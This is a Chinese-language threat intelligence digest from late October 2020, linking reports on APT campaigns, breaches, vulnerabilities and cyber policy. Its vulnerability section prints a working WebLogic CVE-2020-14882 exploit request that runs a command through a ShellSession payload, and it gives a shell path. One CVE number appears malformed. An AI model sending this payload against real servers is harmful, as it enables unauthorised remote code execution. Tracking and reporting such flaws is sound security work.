今日威胁情报2020/10/29-31(第316期）

高级威胁

1、肚脑虫组织（ APT-C-35）疑似针对巴基斯坦军事人员的最新攻击活动

肚脑虫组织（APT-C-35），又称Donot，是一个针对克什米尔地区相关国家的政府机构等领域进行网络间谍活动，以窃取敏感信息为主的攻击组织。该组织具备针对Windows与Android双平台的攻击能力。该组织的攻击活动最早可追溯到2016年，近年来该组织活动频繁不断被数个国内外安全团队持续追踪和披露。

今年4月，我们发布了一篇《肚脑虫组织（APT-C-35）针对巴基斯坦的攻击活动》(报告请戳“阅读原文”)揭露了肚脑虫组织利用钓鱼网站和社交媒体进行网络攻击活动。此后，我们也持续针对该组织样本进行了监控。近期，我们发现该组织攻击样本与早期样本存在明显的变化，此次攻击活动中使用的攻击样本中字符串使用了Base64进行编码，并且与CC进行通信的方式也发生了较大的改变，攻击目标为克什米尔周边地区，受害者疑似包含军事背景人员。

https://mp.weixin.qq.com/s/4suKWtw74P4Ar_RDw8TETg

2、攻击武器再升级：Donot组织利用伪造签名样本的攻击活动分析。

Donot“肚脑虫”APT组织是疑似具有南亚背景的APT组织，其主要以周边国家的政府机构为目标进行网络攻击活动，通常以窃取敏感信息为目的。该组织具备针对Windows与Android双平台的攻击能力。

2020年6月下旬，奇安信威胁情报中心披露了该组织利用升级版数字武器的攻击活动，近日，红雨滴团队在日常的高级威胁狩猎中，再次捕获了Donot组织新一轮的攻击活动样本。此次攻击活动中，该组织依旧采用宏利用样本作为初始攻击载荷，从远程服务器获取恶意代码执行，同时弹出错误提示框以迷惑受害者。下载执行的恶意代码均携带了无效的签名信息。

https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw

3、思科安全团队发布关于Donot利用Google Firebase Cloud Messaging进行传播

https://blog.talosintelligence.com/2020/10/donot-firestarter.html

4、伊朗高级持续威胁组织已获得美国选民登记数据，主要技术：SQL注入

https://us-cert.cisa.gov/ncas/alerts/aa20-304a

5、美国网军司令部公布俄罗斯APT组织Turla 样本

https://www.virustotal.com/en/user/CYBERCOM_Malware_Alert/

6、Earth Earth Kitsune，针对朝鲜侨民的水坑攻击，后续新样本

https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html

之前的分析帖子：

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-earth-kitsune-tracking-slub-s-current-operations

7、伊朗APT组织Phosphorus入侵沙特阿拉伯T20峰会和慕尼黑安全会议

https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/

技术分享

1、10个角度预防勒索病毒，本文近期热门的医院角度如何防御ryuk勒索病毒

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

2、NAT技术slipstream，科普好文

https://samy.pl/slipstream/

漏洞相关

1、CVE-2020–14882 Weblogic未经授权的旁路RCE，最全的分析文档了。

POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1Host: 172.16.242.134:7001Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 117
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime('calc.exe');");

shell

ROOT_PATH= C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domain
Shell_path= ../../../wlserver/server/lib/consoleapp/webapp/images/xxx.jsp

https://github.com//jas502n//CVE-2020-14882

2、windows 0day CVE-2020-117087 提权漏洞

https://bugs.chromium.org/p/project-zero/issues/detail?id=2104

数据泄露

1、5个影响巨大的数据泄露事件：Equifax、Marriott、eBay、TargetAdult Friend Finder、

https://www.welivesecurity.com/2020/10/30/5-scary-data-breaches-shook-world/

2、Alibaba's Online Store Redmart Suffers Data Breach of More Than Million Accounts, Experts say Company's Fault

https://www.ehackingnews.com/2020/10/alibabas-online-store-redmart-suffers.html

网络战与网络情报

1、老美国务院，赤裸裸反我。文中的字，我一个也不敢发，老哥们想了解详情自己看原文吧，备注来源：东亚及太平洋事务助理秘书长局局长DAVIDR. STILWELL。美国斯坦福大学亚洲学会胡佛研究所。作者跟美国前国务卿莱斯一起对本文负责，可见，民主党派就算在今年上台，对华策略也不会有很大转变。

https://www.state.gov/covert-coercive-and-corrupting-countering-the-chinese-communist-partys-malign-influence-in-free-societies/

2、联合国发布新冠疫情期间的病毒监控和传播监控，当然，又有专家出来喊人权了

https://www.ohchr.org/EN/NewsEvents/Pages/DisplayNews.aspx?NewsID=26446&LangID=E

https://undocs.org/zh/A/75/147

3、【重要分析报告】从2016年美国大选中，我们应该学到什么

https://gizmodo.com/what-the-u-s-should-have-learned-from-the-2016-electio-1845527674

广告时间

360威胁情报中心TI新版上线

https://ti.360.cn

本文始发于微信公众号（ThreatPage全球威胁情报）：今日威胁情报2020/10/29-31(第316期）